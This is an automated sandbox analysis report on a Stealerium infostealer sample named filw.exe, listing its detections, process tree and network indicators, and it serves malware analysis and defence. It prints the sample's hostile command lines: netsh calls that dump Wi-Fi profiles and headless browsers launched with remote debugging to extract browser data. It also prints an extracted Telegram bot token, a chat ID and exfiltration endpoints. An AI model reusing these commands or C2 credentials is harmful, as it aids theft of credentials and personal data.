Edit tour

Windows Analysis Report
filw.exe

Overview

General Information

Sample name:	filw.exe
Analysis ID:	1610190
MD5:	a5dc5dfb3d20c67a35c1ee67e010fc7b
SHA1:	94694b8cf4d9558014f78037e1fd6fcfe4ddd4e3
SHA256:	1d810a842c4a71e7490f0a88bb9b0d3c82b084147e73fb2e4ef3c32456055d04
Tags:	exeStealeriumStealeruser-aachum
Infos:

Detection

Stealerium

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected AntiVM5

Yara detected Stealerium

Yara detected Telegram RAT

Yara detected Telegram Recon

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Drops password protected ZIP file

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

filw.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\filw.exe" MD5: A5DC5DFB3D20C67A35C1EE67E010FC7B)

cmd.exe (PID: 7592 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 7720 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 7740 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

chrome.exe (PID: 7628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,4376263706655546236,12928841589883637916,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 4592 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7596 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 2000 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

msedge.exe (PID: 792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2132 --field-trial-handle=2040,i,9187529698848839277,3688106472142960608,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 8504 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5be28a57-b86d-4b0e-85c0-f6e6ec846e1e.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8712 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

taskkill.exe (PID: 8716 cmdline: taskkill /F /PID 7432 MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

timeout.exe (PID: 5024 cmdline: timeout /T 2 /NOBREAK MD5: 100065E21CFBBDE57CBA2838921F84D6)

msiexec.exe (PID: 5808 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msedge.exe (PID: 7852 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging --noerrdialogs --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8044 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2180 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6384 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8612 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6736 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

identity_helper.exe (PID: 8796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)

identity_helper.exe (PID: 8844 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)

msedge.exe (PID: 8492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6928 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealerium	According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.	No Attribution	https://github.com/Stealerium/Stealerium https://resources.securityscorecard.com/research/stealerium-detailed-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/sendMessage"}

Threatname: Stealerium

{"C2 url": "https://api.telegram.org/bot", "Token": "7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU", "Chat ID": "6967646440"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
filw.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
filw.exe	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
filw.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
filw.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
filw.exe	JoeSecurity_AntiVM_5	Yara detected AntiVM_5	Joe Security
filw.exe	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x5f7406:$stl: Stealerium 0x5f7626:$stl: Stealerium 0x5f8bb6:$stl: Stealerium 0x5f9b44:$stl: Stealerium 0x5fa2cb:$stl: Stealerium 0x5fa366:$stl: Stealerium 0x5fa8c9:$stl: Stealerium 0x5faf09:$stl: Stealerium 0x5fafeb:$stl: Stealerium 0x5fb73b:$stl: Stealerium 0x5fbacb:$stl: Stealerium 0x5fbce2:$stl: Stealerium 0x5fbd04:$stl: Stealerium 0x5fbd2b:$stl: Stealerium 0x5fc199:$stl: Stealerium 0x5fc330:$stl: Stealerium 0x5fc9c1:$stl: Stealerium 0x5fcc8f:$stl: Stealerium 0x5feaa9:$stl: Stealerium 0x60c567:$stl: Stealerium 0x60d72f:$stl: Stealerium
filw.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x603b6c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH.zip	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1993398707.0000019D12A43000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.1993398707.0000019D12496000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1993398707.0000019D128E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2954:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_5	Yara detected AntiVM_5	Joe Security
00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_5	Yara detected AntiVM_5	Joe Security
00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x60396c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: filw.exe PID: 7432	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
Process Memory Space: filw.exe PID: 7432	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: filw.exe PID: 7432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: filw.exe PID: 7432	JoeSecurity_AntiVM_5	Yara detected AntiVM_5	Joe Security
Process Memory Space: filw.exe PID: 7432	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: filw.exe PID: 7432	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x5b143:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.filw.exe.19d101d0000.0.unpack	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
0.0.filw.exe.19d101d0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.0.filw.exe.19d101d0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.filw.exe.19d101d0000.0.unpack	JoeSecurity_AntiVM_5	Yara detected AntiVM_5	Joe Security
0.0.filw.exe.19d101d0000.0.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x5f7406:$stl: Stealerium 0x5f7626:$stl: Stealerium 0x5f8bb6:$stl: Stealerium 0x5f9b44:$stl: Stealerium 0x5fa2cb:$stl: Stealerium 0x5fa366:$stl: Stealerium 0x5fa8c9:$stl: Stealerium 0x5faf09:$stl: Stealerium 0x5fafeb:$stl: Stealerium 0x5fb73b:$stl: Stealerium 0x5fbacb:$stl: Stealerium 0x5fbce2:$stl: Stealerium 0x5fbd04:$stl: Stealerium 0x5fbd2b:$stl: Stealerium 0x5fc199:$stl: Stealerium 0x5fc330:$stl: Stealerium 0x5fc9c1:$stl: Stealerium 0x5fcc8f:$stl: Stealerium 0x5feaa9:$stl: Stealerium 0x60c567:$stl: Stealerium 0x60d72f:$stl: Stealerium
0.0.filw.exe.19d101d0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x603b6c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\filw.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\filw.exe", ParentImage: C:\Users\user\Desktop\filw.exe, ParentProcessId: 7432, ParentProcessName: filw.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, ProcessId: 7628, ProcessName: chrome.exe

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\filw.exe", ParentImage: C:\Users\user\Desktop\filw.exe, ParentProcessId: 7432, ParentProcessName: filw.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, ProcessId: 7628, ProcessName: chrome.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\filw.exe", ParentImage: C:\Users\user\Desktop\filw.exe, ParentProcessId: 7432, ParentProcessName: filw.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7592, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Possible Generic RAT over Telegram API

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T18:34:41.054964+0100	2029323	1	Malware Command and Control Activity Detected	192.168.2.4	49858	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T18:34:14.195824+0100	2803305	3	Unknown Traffic	192.168.2.4	49733	185.199.108.133	443	TCP
2025-02-08T18:34:19.326998+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	185.199.108.133	443	TCP
2025-02-08T18:34:33.299891+0100	2803305	3	Unknown Traffic	192.168.2.4	49817	104.16.185.241	80	TCP
2025-02-08T18:34:33.452503+0100	2803305	3	Unknown Traffic	192.168.2.4	49818	185.199.108.133	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T18:34:41.054964+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49858	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Stealerium {"C2 url": "https://api.telegram.org/bot", "Token": "7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU", "Chat ID": "6967646440"}
Source: filw.exe.7432.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/sendMessage"}

Multi AV Scanner detection for submitted file

Source: filw.exe	ReversingLabs: Detection: 71%
Source: filw.exe	Virustotal: Detection: 62%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Machine Learning detection for sample

Source: filw.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: filw.exe	String decryptor: 7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU
Source: filw.exe	String decryptor: 6967646440
Source: filw.exe	String decryptor: https://api.telegram.org/bot
Source: filw.exe	String decryptor: https://szurubooru.zulipchat.com/api/v1/messages
Source: filw.exe	String decryptor: szurubooru@gmail.com
Source: filw.exe	String decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.112.123.226:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.225.37.215:443 -> 192.168.2.4:49860 version: TLS 1.2

Source: filw.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed3sqlitepclraw.batteries_v2acostura.sqlitepclraw.batteries_v2.dll.compressed#sqlitepclraw.coreQcostura.sqlitepclraw.core.dll.compressedGsqlitepclraw.provider.dynamic_cdeclucostura.sqlitepclraw.provider.dynamic_cdecl.dll.compressed source: filw.exe
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2005243574.0000019D2B860000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D229DD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: filw.exe, 00000000.00000002.2003618026.0000019D2B320000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: filw.exe
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed\|\|\|Newtonsoft.Json.Bson.pdb\|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F\|26968 source: filw.exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2005243574.0000019D2B860000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D229DD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr
Source:	Binary string: costura.costura.pdb.compressed source: filw.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed source: filw.exe
Source:	Binary string: !costura.polly.core.pdb.compressed source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: filw.exe
Source:	Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressed source: filw.exe
Source:	Binary string: olnl.pdb source: filw.exe, 00000000.00000002.2001203296.0000019D2AC7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: filw.exe, 00000000.00000002.2004906378.0000019D2B810000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: filw.exe, 00000000.00000002.2004906378.0000019D2B810000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: filw.exe, 00000000.00000002.2003583949.0000019D2B310000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdbSHA256* source: filw.exe, 00000000.00000002.2005115328.0000019D2B820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: filw.exe
Source:	Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed source: filw.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed\|\|\|Wpf.Ui.pdb\|299223DFCADFE8FD464F218CE110C10266AB22B0\|139288 source: filw.exe
Source:	Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
